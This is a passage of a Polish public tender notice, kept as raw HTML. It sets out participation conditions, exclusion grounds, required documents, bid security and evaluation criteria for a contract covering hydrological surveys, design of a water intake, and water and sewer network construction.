id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 5 do SIWZ. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Część nr 1:Zamawiający uzna warunek za spełniony, jeśli wykonawca wykaże ,że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 2 000 000,00 zł.Część nr 2:Zamawiający uzna warunek za spełniony, jeśli wykonawca wykaże ,że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 1 000 000,00 zł.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe">UWAGA: W przypadku składania ofert na dwie części zamówień, wykonawca może wykazać się sytuacją ekonomiczną i finansową na części, na które składa oferty, jeżeli sumaryczna wartości sumy gwarancyjnej ubezpieczenia odpowiada sumarycznej wartości opisanego warunku.UWAGA: Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartości zostaną podane w walutach innych niż złoty, Zamawiający przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w BZP. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w BZP, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w BZP, w którym zostanie on opublikowany.</span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Część nr 1:Doświadczenie:Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów określających, czy roboty/usługi zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - co najmniej:	jedne (1) usługi w zakresie badań i analiz hydrologicznych - rozpoznawczych dla ujęcia wody o wydajności nie mniejszej niż 10 m3/h;ORAZ	jedne (1) usługi projektowania w zakresie budowy nowego ujęcia wody służącego zbiorowemu zaopatrzeniu w wodę wraz z niezbędnymi sieciami i obiektami technologicznymi, i obowiązkiem uzyskania pozwolenia wodnoprawnego na pobór wód podziemnych ujęcia, o wartości wykonanej usługi nie mniejszej niż 50 000,00 zł;	dwie (2) roboty budowlane w zakresie budowy, przebudowy lub rozbudowy sieci wod-kan wraz z niezbędną infrastrukturą towarzyszącą, o wartości wykonanych robót nie mniejszej niż 500 000,00 zł każda; EWENTUALNIE (zamiast jednej usługi w zakresie projektowania i dwóch robót budowlanych):	dwie (2) roboty budowlane w systemie „zaprojektuj i wybuduj” w zakresie budowy, przebudowy lub rozbudowy sieci wod-kan wraz z niezbędną infrastrukturą towarzyszącą, o wartości wykonanych robót nie mniejszej niż 550 000,00 zł każda; Potencjał techniczny:Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 5 do SIWZ. Potencjał kadrowy:Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami:	kierownika budowy, posiadającego uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, wodociągowych, kanalizacyjnych i cieplnych;	kierownika robót, posiadającego uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjnej;	kierownika robót, posiadającego uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie instalacji i sieci elektrycznych;	osobą posiadającą uprawnienia do projektowania w zakresie odpowiadającym przedmiotowi zamówienia – w specjalności konstrukcyjnej;	osobą posiadającą uprawnienia do projektowania w zakresie odpowiadającym przedmiotowi zamówienia – w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, wodociągowych, kanalizacyjnych i cieplnych;	osobą posiadającą uprawnienia do projektowania w zakresie odpowiadającym przedmiotowi zamówienia – w specjalności instalacyjnej w zakresie instalacji i sieci elektrycznych.	osobą posiadającą wykształcenie wyższe z zakresu hydrologii.Część nr 2:Doświadczenie:Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów określających, czy roboty/usług zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - co najmniej:	jedne (1) usługi w zakresie projektowania w zakresie budowy, przebudowy lub rozbudowy sieci wodociągowej wraz z niezbędnymi obiektami technologicznymi, o wartości wykonanej usługi nie mniejszej niż 50 000,00 zł;	dwie (2) roboty budowlane w zakresie budowy, przebudowy lub rozbudowy sieci wodociągowej wraz z niezbędną infrastrukturą towarzyszącą, o wartości wykonanych robót nie mniejszej niż 500 000,00 zł każda; EWENTUALNIE (zamiast jednej usługi w zakresie projektowania i dwóch robót budowlanych):	dwie (2) roboty budowlane w systemie „zaprojektuj i wybuduj” w zakresie budowy, przebudowy lub rozbudowy sieci wodociągowej wraz z niezbędną infrastrukturą towarzyszącą, o wartości wykonanych robót nie mniejszej niż 550 000,00 zł każda; Potencjał techniczny:Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 5 do SIWZ. Potencjał kadrowy:Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami:	kierownika budowy, posiadającego uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, wodociągowych, kanalizacyjnych i cieplnych;	kierownika robót, posiadającego uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjnej;	kierownika robót, posiadającego uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie instalacji i sieci elektrycznych;	osobą posiadającą uprawnienia do projektowania w zakresie odpowiadającym przedmiotowi zamówienia – w specjalności konstrukcyjnej;	osobą posiadającą uprawnienia do projektowania w zakresie odpowiadającym przedmiotowi zamówienia – w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, wodociągowych, kanalizacyjnych i cieplnych;	osobą posiadającą uprawnienia do projektowania w zakresie odpowiadającym przedmiotowi zamówienia – w specjalności instalacyjnej w zakresie instalacji i sieci elektrycznych.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia braku podstaw wykluczenia określonych w Sekcji VI SIWZ, Zamawiający żąda od wykonawcy następujących dokumentów: a)	informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy – PZP, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;b)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy - PZP;c)	oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo – w przypadku wydania takiego wyroku lub decyzji – dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności; wzór oświadczenia stanowi zał. nr 11 do SIWZ;d)	oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne; wzór oświadczenia stanowi zał. nr 11 do SIWZ;e)	oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu; wzór oświadczenia stanowi zał. nr 7 do SIWZ.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">7)	W celu potwierdzenia spełniania warunków udziału w postępowaniu określonych w Sekcji V SIWZ, Zamawiający żąda od wykonawcy następujących dokumentów:a)	dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;b)	wykazu robót/usług, z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty/usługi te zostały wykonane, zgodnie ze wzorem stanowiącym zał. nr 9 do SIWZ, z załączeniem dowodów określających, czy te roboty/usługi zostały wykonane należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty/usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty; referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania;c)	wykazu osób skierowanych przez wykonawcę do realizacji zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, uprawnień niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie ze wzorem stanowiącym zał. nr 10 do SIWZ, z załączeniem dowodów potwierdzających kwalifikacje. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1) wykaz podwykonawców, 2) oświadczenie podmiotu, o którym mowa w art. 22a ustawy-PZP.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Przed upływem terminu składania ofert wykonawca zobowiązany jest do wniesienia wadium w wysokości:a)	Część nr 1: 30 000,00 zł;b)	Część nr 2: 15 000,00 zł.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres gwarancji i rękojmi </TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1)	Zamawiający dokonana odpowiednich zmian umowy w zakresie wysokości wynagrodzenia należnego wykonawcy, w przypadku zmiany stawki podatku od towarów i usług – wartość netto wynagrodzenia (tj. bez podatku od towarów i usług) nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona z uwzględnieniem stawki podatku od towarów i usług, wynikającej ze zmienionych przepisów.2)	Zamawiający przewiduje możliwość zmiany zawartej umowy w przypadkach dotyczących:a)	terminu wykonania umowy;b)	materiałów, parametrów technicznych, technologii rodzaju, zakresu i sposobu wykonania usług lub robót budowlanych objętych przedmiotem umowy;c)	wysokości wynagrodzenia należnego wykonawcy;d)	zmian podmiotów trzecich lub podwykonawców, przy pomocy których wykonawca wykonuje przedmiot umowy, po zawarciu umowy;e)	zmian kluczowego personelu wykonawcy;f)	nazw, siedziby i form organizacyjno-prawnej Zamawiającego lub wykonawcy, a także numerów kont bankowych i innych danych identyfikacyjnych Zamawiającego lub wykonawcy.3)	Zmiana terminu wykonania niniejszej umowy może 